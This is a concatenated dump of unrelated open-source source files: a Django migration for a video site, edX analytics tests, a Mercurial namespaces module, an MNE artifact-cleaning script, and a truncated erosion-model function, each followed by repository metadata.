'total_videos': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'videos_imported': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'videos_skipped': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
},
'localtv.feedimportindex': {
'Meta': {'object_name': 'FeedImportIndex'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'index': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'source_import': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['localtv.FeedImport']"}),
'video': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['localtv.Video']", 'unique': 'True'})
},
'localtv.newslettersettings': {
'Meta': {'object_name': 'NewsletterSettings'},
'facebook_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'intro': ('django.db.models.fields.CharField', [], {'max_length': '200', 'blank': 'True'}),
'last_sent': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'repeat': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'show_icon': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'sitelocation': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['localtv.SiteLocation']", 'unique': 'True'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'twitter_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'video1': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'newsletter1'", 'null': 'True', 'to': "orm['localtv.Video']"}),
'video2': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'newsletter2'", 'null': 'True', 'to': "orm['localtv.Video']"}),
'video3': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'newsletter3'", 'null': 'True', 'to': "orm['localtv.Video']"}),
'video4': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'newsletter4'", 'null': 'True', 'to': "orm['localtv.Video']"}),
'video5': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'newsletter5'", 'null': 'True', 'to': "orm['localtv.Video']"})
},
'localtv.originalvideo': {
'Meta': {'object_name': 'OriginalVideo'},
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'remote_thumbnail_hash': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '64'}),
'remote_video_was_deleted': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'thumbnail_updated': ('django.db.models.fields.DateTimeField', [], {'blank': 'True'}),
'thumbnail_url': ('django.db.models.fields.URLField', [], {'max_length': '400', 'blank': 'True'}),
'video': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'original'", 'unique': 'True', 'to': "orm['localtv.Video']"})
},
'localtv.savedsearch': {
'Meta': {'object_name': 'SavedSearch'},
'auto_approve': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'auto_authors': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'auto_savedsearch_set'", 'blank': 'True', 'to': "orm['auth.User']"}),
'auto_categories': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['localtv.Category']", 'symmetrical': 'False', 'blank': 'True'}),
'has_thumbnail': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'query_string': ('django.db.models.fields.TextField', [], {}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sites.Site']"}),
'thumbnail_extension': ('django.db.models.fields.CharField', [], {'max_length': '8', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'blank': 'True'}),
'when_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'})
},
'localtv.searchimport': {
'Meta': {'ordering': "['-start']", 'object_name': 'SearchImport'},
'auto_approve': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'end': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'search': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['localtv.SavedSearch']"}),
'start': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'total_videos': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'videos_imported': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'videos_skipped': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
},
'localtv.searchimportindex': {
'Meta': {'object_name': 'SearchImportIndex'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'index': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'source_import': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['localtv.SearchImport']"}),
'suite': ('django.db.models.fields.CharField', [], {'max_length': '30'}),
'video': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['localtv.Video']", 'unique': 'True'})
},
'localtv.sitelocation': {
'Meta': {'object_name': 'SiteLocation'},
'about_html': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'admins': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'admin_for'", 'blank': 'True', 'to': "orm['auth.User']"}),
'background': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
'comments_required_login': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'css': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'display_submit_button': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'footer_html': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'has_thumbnail': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'hide_get_started': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'logo': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
'playlists_enabled': ('django.db.models.fields.IntegerField', [], {'default': '1'}),
'screen_all_comments': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'sidebar_html': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sites.Site']", 'unique': 'True'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '1'}),
'submission_requires_login': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'tagline': ('django.db.models.fields.CharField', [], {'max_length': '4096', 'blank': 'True'}),
'thumbnail_extension': ('django.db.models.fields.CharField', [], {'max_length': '8', 'blank': 'True'}),
'tier_name': ('django.db.models.fields.CharField', [], {'default': "'basic'", 'max_length': '255'}),
'use_original_date': ('django.db.models.fields.BooleanField', [], {'default': 'True'})
},
'localtv.tierinfo': {
'Meta': {'object_name': 'TierInfo'},
'already_sent_tiers_compliance_email': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'already_sent_welcome_email': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'current_paypal_profile_id': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255', 'blank': 'True'}),
'free_trial_available': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'free_trial_started_on': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'free_trial_warning_sent': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'fully_confirmed_tier_name': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'in_free_trial': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'inactive_site_warning_sent': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'payment_due_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'payment_secret': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255', 'blank': 'True'}),
'should_send_welcome_email_on_paypal_event': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'sitelocation': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['localtv.SiteLocation']", 'unique': 'True'}),
'user_has_successfully_performed_a_paypal_transaction': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'video_allotment_warning_sent': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'waiting_on_payment_until': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'})
},
'localtv.video': {
'Meta': {'ordering': "['-when_submitted']", 'object_name': 'Video'},
'authors': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'authored_set'", 'blank': 'True', 'to': "orm['auth.User']"}),
'calculated_source_type': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255', 'blank': 'True'}),
'categories': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['localtv.Category']", 'symmetrical': 'False', 'blank': 'True'}),
'contact': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '250', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'embed_code': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'feed': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['localtv.Feed']", 'null': 'True', 'blank': 'True'}),
'file_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'file_url_length': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'file_url_mimetype': ('django.db.models.fields.CharField', [], {'max_length': '60', 'blank': 'True'}),
'flash_enclosure_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'guid': ('django.db.models.fields.CharField', [], {'max_length': '250', 'blank': 'True'}),
'has_thumbnail': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_featured': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'notes': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'search': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['localtv.SavedSearch']", 'null': 'True', 'blank': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sites.Site']"}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'thumbnail_extension': ('django.db.models.fields.CharField', [], {'max_length': '8', 'blank': 'True'}),
'thumbnail_url': ('django.db.models.fields.URLField', [], {'max_length': '400', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'blank': 'True'}),
'video_service_url': ('django.db.models.fields.URLField', [], {'default': "''", 'max_length': '200', 'blank': 'True'}),
'video_service_user': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '250', 'blank': 'True'}),
'website_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'when_approved': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'when_modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'auto_now': 'True', 'db_index': 'True', 'blank': 'True'}),
'when_published': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'when_submitted': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'})
},
'localtv.watch': {
'Meta': {'object_name': 'Watch'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ip_address': ('django.db.models.fields.IPAddressField', [], {'max_length': '15'}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'blank': 'True'}),
'video': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['localtv.Video']"})
},
'localtv.widgetsettings': {
'Meta': {'object_name': 'WidgetSettings'},
'bg_color': ('django.db.models.fields.CharField', [], {'max_length': '20', 'blank': 'True'}),
'bg_color_editable': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'border_color': ('django.db.models.fields.CharField', [], {'max_length': '20', 'blank': 'True'}),
'border_color_editable': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'css': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'blank': 'True'}),
'css_editable': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'has_thumbnail': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'icon': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
'icon_editable': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'site': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['sites.Site']", 'unique': 'True'}),
'text_color': ('django.db.models.fields.CharField', [], {'max_length': '20', 'blank': 'True'}),
'text_color_editable': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'thumbnail_extension': ('django.db.models.fields.CharField', [], {'max_length': '8', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '250', 'blank': 'True'}),
'title_editable': ('django.db.models.fields.BooleanField', [], {'default': 'True'})
},
'sites.site': {
'Meta': {'ordering': "('domain',)", 'object_name': 'Site', 'db_table': "'django_site'"},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
}
}
complete_apps = ['localtv']
|
pculture/mirocommunity
|
localtv/migrations/0069_auto__chg_field_feedimport_total_videos__chg_field_searchimport_total_.py
|
Python
|
agpl-3.0
| 25,073
|
""" Tests for analytics.distributions """
from django.test import TestCase
from nose.tools import raises
from opaque_keys.edx.locations import SlashSeparatedCourseKey
from instructor_analytics.distributions import AVAILABLE_PROFILE_FEATURES, profile_distribution
from student.models import CourseEnrollment
from student.tests.factories import UserFactory
class TestAnalyticsDistributions(TestCase):
'''Test analytics distribution gathering.'''
def setUp(self):
super(TestAnalyticsDistributions, self).setUp()
self.course_id = SlashSeparatedCourseKey('robot', 'course', 'id')
self.users = [UserFactory(
profile__gender=['m', 'f', 'o'][i % 3],
profile__level_of_education=['a', 'hs', 'el'][i % 3],
profile__year_of_birth=i + 1930
) for i in xrange(30)]
self.ces = [CourseEnrollment.enroll(user, self.course_id)
for user in self.users]
@raises(ValueError)
def test_profile_distribution_bad_feature(self):
feature = 'robot-not-a-real-feature'
self.assertNotIn(feature, AVAILABLE_PROFILE_FEATURES)
profile_distribution(self.course_id, feature)
def test_profile_distribution_easy_choice(self):
feature = 'gender'
self.assertIn(feature, AVAILABLE_PROFILE_FEATURES)
distribution = profile_distribution(self.course_id, feature)
self.assertEqual(distribution.type, 'EASY_CHOICE')
self.assertEqual(distribution.data['no_data'], 0)
self.assertEqual(distribution.data['m'], len(self.users) / 3)
self.assertEqual(distribution.choices_display_names['m'], 'Male')
def test_profile_distribution_open_choice(self):
feature = 'year_of_birth'
self.assertIn(feature, AVAILABLE_PROFILE_FEATURES)
distribution = profile_distribution(self.course_id, feature)
print distribution
self.assertEqual(distribution.type, 'OPEN_CHOICE')
self.assertTrue(hasattr(distribution, 'choices_display_names'))
self.assertEqual(distribution.choices_display_names, None)
self.assertNotIn('no_data', distribution.data)
self.assertEqual(distribution.data[1930], 1)
def test_gender_count(self):
course_enrollments = CourseEnrollment.objects.filter(
course_id=self.course_id, user__profile__gender='m'
)
distribution = profile_distribution(self.course_id, "gender")
self.assertEqual(distribution.data['m'], len(course_enrollments))
course_enrollments[0].deactivate()
distribution = profile_distribution(self.course_id, "gender")
self.assertEqual(distribution.data['m'], len(course_enrollments) - 1)
def test_level_of_education_count(self):
course_enrollments = CourseEnrollment.objects.filter(
course_id=self.course_id, user__profile__level_of_education='hs'
)
distribution = profile_distribution(self.course_id, "level_of_education")
self.assertEqual(distribution.data['hs'], len(course_enrollments))
course_enrollments[0].deactivate()
distribution = profile_distribution(self.course_id, "level_of_education")
self.assertEqual(distribution.data['hs'], len(course_enrollments) - 1)
class TestAnalyticsDistributionsNoData(TestCase):
'''Test analytics distribution gathering.'''
def setUp(self):
super(TestAnalyticsDistributionsNoData, self).setUp()
self.course_id = SlashSeparatedCourseKey('robot', 'course', 'id')
self.users = [UserFactory(
profile__year_of_birth=i + 1930,
) for i in xrange(5)]
self.nodata_users = [UserFactory(
profile__year_of_birth=None,
profile__gender=[None, ''][i % 2]
) for i in xrange(4)]
self.users += self.nodata_users
self.ces = tuple(CourseEnrollment.enroll(user, self.course_id)
for user in self.users)
def test_profile_distribution_easy_choice_nodata(self):
feature = 'gender'
self.assertIn(feature, AVAILABLE_PROFILE_FEATURES)
distribution = profile_distribution(self.course_id, feature)
print distribution
self.assertEqual(distribution.type, 'EASY_CHOICE')
self.assertTrue(hasattr(distribution, 'choices_display_names'))
self.assertNotEqual(distribution.choices_display_names, None)
self.assertIn('no_data', distribution.data)
self.assertEqual(distribution.data['no_data'], len(self.nodata_users))
def test_profile_distribution_open_choice_nodata(self):
feature = 'year_of_birth'
self.assertIn(feature, AVAILABLE_PROFILE_FEATURES)
distribution = profile_distribution(self.course_id, feature)
print distribution
self.assertEqual(distribution.type, 'OPEN_CHOICE')
self.assertTrue(hasattr(distribution, 'choices_display_names'))
self.assertEqual(distribution.choices_display_names, None)
self.assertIn('no_data', distribution.data)
self.assertEqual(distribution.data['no_data'], len(self.nodata_users))
|
pepeportela/edx-platform
|
lms/djangoapps/instructor_analytics/tests/test_distributions.py
|
Python
|
agpl-3.0
| 5,109
|
# Portions Copyright (c) Facebook, Inc. and its affiliates.
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2.
# Copyright 2014 Mercurial Contributors
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
from __future__ import absolute_import
from . import error, pycompat, registrar, templatekw, util
from .i18n import _
from .node import hex
namespacetable = util.sortdict()
def tolist(val):
"""
a convenience method to return an empty list instead of None
"""
if val is None:
return []
else:
return [val]
# Do not use builtinnamespace in extension code. Use `registrar.namespacetable`
# instead.
builtinnamespace = registrar.namespacepredicate(namespacetable)
@builtinnamespace("bookmarks", priority=10)
def bookmarks(repo):
bmknames = lambda repo: repo._bookmarks.keys()
bmknamemap = lambda repo, name: tolist(repo._bookmarks.get(name))
bmknodemap = lambda repo, node: repo.nodebookmarks(node)
return namespace(
templatename="bookmark",
logfmt=templatekw.getlogcolumns()["bookmark"],
listnames=bmknames,
namemap=bmknamemap,
nodemap=bmknodemap,
builtin=True,
)
@builtinnamespace("branches", priority=30)
def branches(repo):
bnames = lambda repo: repo.branchmap().keys()
bnamemap = lambda repo, name: tolist(repo.branchtip(name, True))
bnodemap = lambda repo, node: [repo[node].branch()]
return namespace(
templatename="branch",
logfmt=templatekw.getlogcolumns()["branch"],
listnames=bnames,
namemap=bnamemap,
nodemap=bnodemap,
builtin=True,
)
@builtinnamespace("remotebookmarks", priority=55)
def remotebookmarks(repo):
namemap = lambda repo, name: repo._remotenames.mark2nodes().get(name, [])
return namespace(
templatename="remotebookmarks",
logname="bookmark",
colorname="remotebookmark",
listnames=lambda repo: repo._remotenames.mark2nodes().keys(),
namemap=namemap,
nodemap=lambda repo, node: repo._remotenames.node2marks().get(node, []),
builtin=True,
)
@builtinnamespace("hoistednames", priority=60)
def hoistednames(repo):
hoist = repo.ui.config("remotenames", "hoist")
# hoisting only works if there are remote bookmarks
if hoist:
namemap = lambda repo, name: repo._remotenames.hoist2nodes(hoist).get(name, [])
return namespace(
templatename="hoistednames",
logname="hoistedname",
colorname="hoistedname",
listnames=lambda repo: repo._remotenames.hoist2nodes(hoist).keys(),
namemap=namemap,
nodemap=lambda repo, node: repo._remotenames.node2hoists(hoist).get(
node, []
),
builtin=True,
)
else:
return None
class namespaces(object):
"""provides an interface to register and operate on multiple namespaces. See
the namespace class below for details on the namespace object.
"""
_names_version = 0
def __init__(self, repo):
self._names = util.sortdict()
# Insert namespaces specified in the namespacetable, sorted
# by priority.
def sortkey(tup):
name, func = tup
return (func._priority, name)
for name, func in sorted(namespacetable.items(), key=sortkey):
ns = func(repo)
if ns is not None:
self._addnamespace(name, ns)
def __getitem__(self, namespace):
"""returns the namespace object"""
return self._names[namespace]
def __iter__(self):
return self._names.__iter__()
def items(self):
return pycompat.iteritems(self._names)
iteritems = items
def _addnamespace(self, name, namespace):
"""register a namespace
name: the name to be registered (in plural form)
namespace: namespace to be registered
"""
self._names[name] = namespace
# we only generate a template keyword if one does not already exist
if name not in templatekw.keywords:
def generatekw(**args):
return templatekw.shownames(name, **args)
templatekw.keywords[name] = generatekw
def singlenode(self, repo, name):
"""
Return the 'best' node for the given name. Best means the first node
in the first nonempty list returned by a name-to-nodes mapping function
in the defined precedence order.
Raises a KeyError if there is no such node.
"""
for ns, v in pycompat.iteritems(self._names):
# Fast path: do not consider branches unless it's "default".
if ns == "branches" and name != "default":
continue
n = v.namemap(repo, name)
if n:
# return max revision number
if len(n) > 1:
cl = repo.changelog
maxrev = max(cl.rev(node) for node in n)
return cl.node(maxrev)
return n[0]
raise KeyError(_("no such name: %s") % name)
class namespace(object):
"""provides an interface to a namespace
Namespaces are basically generic many-to-many mapping between some
(namespaced) names and nodes. The goal here is to control the pollution of
jamming things into bookmarks (in extension-land) and to simplify
internal bits of mercurial: log output, tab completion, etc.
More precisely, we define a mapping of names to nodes, and a mapping from
nodes to names. Each mapping returns a list.
Furthermore, each name mapping will be passed a name to lookup which might
not be in its domain. In this case, each method should return an empty list
and not raise an error.
This namespace object will define the properties we need:
'name': the namespace (plural form)
'templatename': name to use for templating (usually the singular form
of the plural namespace name)
'listnames': list of all names in the namespace (usually the keys of a
dictionary)
'namemap': function that takes a name and returns a list of nodes
'nodemap': function that takes a node and returns a list of names
'deprecated': set of names to be masked for ordinary use
'builtin': bool indicating if this namespace is supported by core
Mercurial.
"""
def __init__(
self,
templatename=None,
logname=None,
colorname=None,
logfmt=None,
listnames=None,
namemap=None,
nodemap=None,
deprecated=None,
builtin=False,
):
"""create a namespace
templatename: the name to use for templating
logname: the name to use for log output; if not specified templatename
is used
colorname: the name to use for colored log output; if not specified
logname is used
logfmt: the format to use for (i18n-ed) log output; if not specified
it is composed from logname
listnames: function to list all names
namemap: function that inputs a name, output node(s)
nodemap: function that inputs a node, output name(s)
deprecated: set of names to be masked for ordinary use
builtin: whether namespace is implemented by core Mercurial
"""
self.templatename = templatename
self.logname = logname
self.colorname = colorname
self.logfmt = logfmt
self.listnames = listnames
self.namemap = namemap
self.nodemap = nodemap
# if logname is not specified, use the template name as backup
if self.logname is None:
self.logname = self.templatename
# if colorname is not specified, just use the logname as a backup
if self.colorname is None:
self.colorname = self.logname
# if logfmt is not specified, compose it from logname as backup
if self.logfmt is None:
# i18n: column positioning for "hg log"
self.logfmt = ("%s:" % self.logname).ljust(13) + "%s\n"
if deprecated is None:
self.deprecated = set()
else:
self.deprecated = deprecated
self.builtin = builtin
def names(self, repo, node):
"""method that returns a (sorted) list of names in a namespace that
match a given node"""
return sorted(self.nodemap(repo, node))
def nodes(self, repo, name):
"""method that returns a list of nodes in a namespace that
match a given name.
"""
return sorted(self.namemap(repo, name))
def loadpredicate(ui, extname, registrarobj):
for name, ns in pycompat.iteritems(registrarobj._table):
if name in namespacetable:
            raise error.ProgrammingError("namespace '%s' is already registered" % name)
namespacetable[name] = ns
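# A minimal sketch of how an extension could register its own namespace using
# this module's registrar pattern (it mirrors builtinnamespace above). The names
# "guestbookmarks" and repo._guestmarks are invented placeholders, and this
# helper is never called by the module itself.
def _example_extension_namespace():
    extnamespaces = util.sortdict()
    extpredicate = registrar.namespacepredicate(extnamespaces)
    @extpredicate("guestbookmarks", priority=70)
    def guestbookmarks(repo):
        marks = getattr(repo, "_guestmarks", {})
        return namespace(
            templatename="guestbookmark",
            listnames=lambda repo: list(marks.keys()),
            namemap=lambda repo, name: tolist(marks.get(name)),
            nodemap=lambda repo, node: [n for n, v in marks.items() if v == node],
        )
    # loadpredicate() above is what would merge such a table into namespacetable.
    return extnamespaces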
|
facebookexperimental/eden
|
eden/hg-server/edenscm/mercurial/namespaces.py
|
Python
|
gpl-2.0
| 9,152
|
#!/usr/bin/env python
"""Clean a raw file from EOG and ECG artifacts with PCA (ie SSP)
"""
from __future__ import print_function
# Authors : Dr Engr. Sheraz Khan, P.Eng, Ph.D.
# Engr. Nandita Shetty, MS.
# Alexandre Gramfort, Ph.D.
import os
import sys
import mne
def clean_ecg_eog(in_fif_fname, out_fif_fname=None, eog=True, ecg=True,
ecg_proj_fname=None, eog_proj_fname=None,
ecg_event_fname=None, eog_event_fname=None, in_path='.'):
"""Clean ECG from raw fif file
Parameters
----------
in_fif_fname : string
Raw fif File
eog_event_fname : string
name of EOG event file required.
eog : bool
Reject or not EOG artifacts.
ecg : bool
Reject or not ECG artifacts.
ecg_event_fname : string
name of ECG event file required.
in_path :
Path where all the files are.
"""
if not eog and not ecg:
raise Exception("EOG and ECG cannot be both disabled")
# Reading fif File
raw_in = mne.io.Raw(in_fif_fname)
if in_fif_fname.endswith('_raw.fif') or in_fif_fname.endswith('-raw.fif'):
prefix = in_fif_fname[:-8]
else:
prefix = in_fif_fname[:-4]
if out_fif_fname is None:
out_fif_fname = prefix + '_clean_ecg_eog_raw.fif'
if ecg_proj_fname is None:
ecg_proj_fname = prefix + '_ecg_proj.fif'
if eog_proj_fname is None:
eog_proj_fname = prefix + '_eog_proj.fif'
if ecg_event_fname is None:
ecg_event_fname = prefix + '_ecg-eve.fif'
if eog_event_fname is None:
eog_event_fname = prefix + '_eog-eve.fif'
print('Implementing ECG and EOG artifact rejection on data')
if ecg:
ecg_events, _, _ = mne.preprocessing.find_ecg_events(raw_in)
print("Writing ECG events in %s" % ecg_event_fname)
mne.write_events(ecg_event_fname, ecg_events)
print('Computing ECG projector')
command = ('mne_process_raw --cd %s --raw %s --events %s --makeproj '
'--projtmin -0.08 --projtmax 0.08 --saveprojtag _ecg_proj '
'--projnmag 2 --projngrad 1 --projevent 999 --highpass 5 '
'--lowpass 35 --projmagrej 4000 --projgradrej 3000'
% (in_path, in_fif_fname, ecg_event_fname))
st = os.system(command)
if st != 0:
print("Error while running : %s" % command)
if eog:
eog_events = mne.preprocessing.find_eog_events(raw_in)
print("Writing EOG events in %s" % eog_event_fname)
mne.write_events(eog_event_fname, eog_events)
print('Computing EOG projector')
command = ('mne_process_raw --cd %s --raw %s --events %s --makeproj '
'--projtmin -0.15 --projtmax 0.15 --saveprojtag _eog_proj '
'--projnmag 2 --projngrad 2 --projevent 998 --lowpass 35 '
'--projmagrej 4000 --projgradrej 3000' % (in_path,
in_fif_fname, eog_event_fname))
print('Running : %s' % command)
st = os.system(command)
if st != 0:
raise ValueError('Problem while running : %s' % command)
if out_fif_fname is not None:
# Applying the ECG EOG projector
print('Applying ECG EOG projector')
command = ('mne_process_raw --cd %s --raw %s '
'--proj %s --projoff --save %s --filteroff'
% (in_path, in_fif_fname, in_fif_fname, out_fif_fname))
command += ' --proj %s --proj %s' % (ecg_proj_fname, eog_proj_fname)
print('Command executed: %s' % command)
st = os.system(command)
if st != 0:
raise ValueError('Pb while running : %s' % command)
print('Done removing artifacts.')
print("Cleaned raw data saved in: %s" % out_fif_fname)
print('IMPORTANT : Please eye-ball the data !!')
else:
print('Projection not applied to raw data.')
if __name__ == '__main__':
from mne.commands.utils import get_optparser
parser = get_optparser(__file__)
parser.add_option("-i", "--in", dest="raw_in",
help="Input raw FIF file", metavar="FILE")
parser.add_option("-o", "--out", dest="raw_out",
help="Output raw FIF file", metavar="FILE",
default=None)
parser.add_option("-e", "--no-eog", dest="eog", action="store_false",
help="Remove EOG", default=True)
parser.add_option("-c", "--no-ecg", dest="ecg", action="store_false",
help="Remove ECG", default=True)
options, args = parser.parse_args()
if options.raw_in is None:
parser.print_help()
sys.exit(1)
raw_in = options.raw_in
raw_out = options.raw_out
eog = options.eog
ecg = options.ecg
clean_ecg_eog(raw_in, raw_out, eog=eog, ecg=ecg)
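# A minimal sketch of calling the cleaning routine from Python rather than the
# command line (file names are placeholders; the function still shells out to
# the MNE-C `mne_process_raw` binary, which must be on the PATH):
#
#     from mne.commands.mne_clean_eog_ecg import clean_ecg_eog
#     clean_ecg_eog('subject_raw.fif', 'subject_clean_ecg_eog_raw.fif',
#                   eog=True, ecg=True, in_path='.')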
|
jaeilepp/eggie
|
mne/commands/mne_clean_eog_ecg.py
|
Python
|
bsd-2-clause
| 4,882
|
from numpy import sum
from numpy import zeros
from gwlfe.Memoization import memoize
from gwlfe.MultiUse_Fxns.Erosion.ErosWashoff import ErosWashoff
from gwlfe.MultiUse_Fxns.Erosion.ErosWashoff import ErosWashoff_f
def LuErosion(NYrs, DaysMonth, InitSnow_0, Temp, Prec, NRur, NUrb, Acoef, KF, LS,
C, P, Area):
result = zeros((NYrs, 10))
eros_washoff = ErosWashoff(NYrs, DaysMonth, InitSnow_0, Temp, Prec, NRur, NUrb, Acoef, KF, LS,
C, P, Area)
for Y in range(NYrs):
for i in range(12):
for l in range(NRur):
result[Y][l] += eros_washoff[Y][l][i]
return result
@memoize
def LuErosion_f(NYrs, DaysMonth, InitSnow_0, Temp, Prec, NRur, Acoef, KF, LS,
C, P, Area):
